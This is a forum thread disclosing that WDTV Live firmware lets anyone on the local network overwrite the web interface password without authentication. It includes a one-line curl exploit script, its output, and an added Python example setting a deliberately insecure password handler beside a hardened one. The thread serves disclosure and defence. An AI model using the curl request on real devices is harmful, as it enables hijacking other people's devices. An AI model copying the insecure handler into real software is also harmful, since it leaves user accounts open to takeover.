Valued Contributor
doubleO8
Posts: 17
Registered: 06-17-2012

Security: Password reset possible from internal LAN IP w/o authentication


It is possible to set a new password for the web interface without further authentication. (One does not have to know the old web interface password to set a new password.)

An HTTP POST request to /DB/modfiy_pwd.php on WDTV Live will overwrite the web interface's password.

Example request using curl:

#!/bin/sh
#IP of WDTV Live:
WDTVLIVE=1.2.3.4
curl -d "password=bla" http://${WDTVLIVE}/DB/modfiy_pw.php

Output:

blaUPDATE web_password SET user_password_pw="bla" where user_id="1"1

Now you can log in to the web interface using password 'bla'.

---

Firmware: 1.09.10 and lower
What hardware and media were you using? WDTV Live SMP (european)
Does it happen every time? sure.
Does it happen with previous firmware? yes.
Does power cycling the unit solve it? of course not.
Does resetting to factory defaults solve it? of course not.
Have you tried this on other devices? WDTVLive Hub
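Added example, not code from the thread or from WD: a Python reconstruction of the behaviour reported above (a new password written for user_id 1 with no check of the old one) beside a hardened handler that verifies the current password and stores a salted hash. The table and column names come from the UPDATE statement echoed in the post; the schema, the form field names and the in-memory database are assumptions.

```python
import hashlib
import hmac
import os
import sqlite3


def hash_password(password, salt=None):
    """Salted PBKDF2-SHA256; stored as '<hex salt>$<hex digest>'."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    """Constant-time comparison against a stored hash_password() value."""
    salt_hex, _ = stored.split("$", 1)
    candidate = hash_password(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(candidate, stored)


def make_db(current_password="original"):
    """Constructed in-memory stand-in for the device's web_password table
    (table and column names from the UPDATE echoed in the post; schema assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE web_password (user_id TEXT PRIMARY KEY, user_password_pw TEXT)")
    db.execute("INSERT INTO web_password VALUES ('1', ?)", (hash_password(current_password),))
    return db


def change_password_vulnerable(db, form):
    """Mirrors the reported behaviour: whatever arrives as 'password' replaces the
    stored one, in clear text, with no proof that the caller knows the old one."""
    db.execute("UPDATE web_password SET user_password_pw=? WHERE user_id='1'",
               (form.get("password", ""),))
    return True


def change_password_hardened(db, form):
    """Requires the current password and verifies it before the row is touched.
    (A session/authentication check in front of this handler is the other layer.)"""
    current = form.get("current_password", "")
    new = form.get("password", "")
    if len(new) < 8:
        return False
    row = db.execute("SELECT user_password_pw FROM web_password WHERE user_id='1'").fetchone()
    if row is None or not verify_password(current, row[0]):
        return False  # missing or wrong current password: nothing changes
    db.execute("UPDATE web_password SET user_password_pw=? WHERE user_id='1'",
               (hash_password(new),))
    return True
```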

Honored Contributor
TonyPh12345
Posts: 17,805
Registered: 01-11-2010

Re: Security: Password reset possible from internal LAN IP w/o authentication

Eeek!

Nasty.

===Live SMP / Live Hub x2 / Live+ / Live x2 / 24 TBytes of QNAP + WD NAS ===
Valued Contributor
doubleO8
Posts: 17
Registered: 06-17-2012

Re: Security: Password reset possible from internal LAN IP w/o authentication

well, it's getting even better - stay tuned :smileywink:

I believe this is an "issue" rather than a "discussion topic" so would the moderators be so kind to move it back to http://community.wdc.com/t5/WD-TV-Live-Streaming-Issue/idb-p/streaming_issues !

Honored Contributor
TonyPh12345
Posts: 17,805
Registered: 01-11-2010

Re: Security: Password reset possible from internal LAN IP w/o authentication

double--- You'll need to also complete all the other info needed to have the issue examined.

===Live SMP / Live Hub x2 / Live+ / Live x2 / 24 TBytes of QNAP + WD NAS ===
Valued Contributor
doubleO8
Posts: 17
Registered: 06-17-2012

Re: Bill_S' reply: Security: Password reset possible from internal LAN IP w/o authentication

"This is not an issue and should not be posted here." (permalink)

Bill_S, could you please elaborate why this security flaw is not an issue and where else one should post issues with Western Digital's Live SMP devices?

Honored Contributor
TonyPh12345
Posts: 17,805
Registered: 01-11-2010

Re: Bill_S' reply: Security: Password reset possible from internal LAN IP w/o authentication

I agree with doubleO8: This is a real issue; the programming for passwords on the WDTV is insecure.

This means that anyone can change the password on the WDTV without needing to know the current password, and then can immediately access the Web UI and make changes without permission.

===Live SMP / Live Hub x2 / Live+ / Live x2 / 24 TBytes of QNAP + WD NAS ===
Valued Contributor
doubleO8
Posts: 17
Registered: 06-17-2012

Re: Bill_S' reply: Security: Password reset possible from internal LAN IP w/o authentication

*bump*
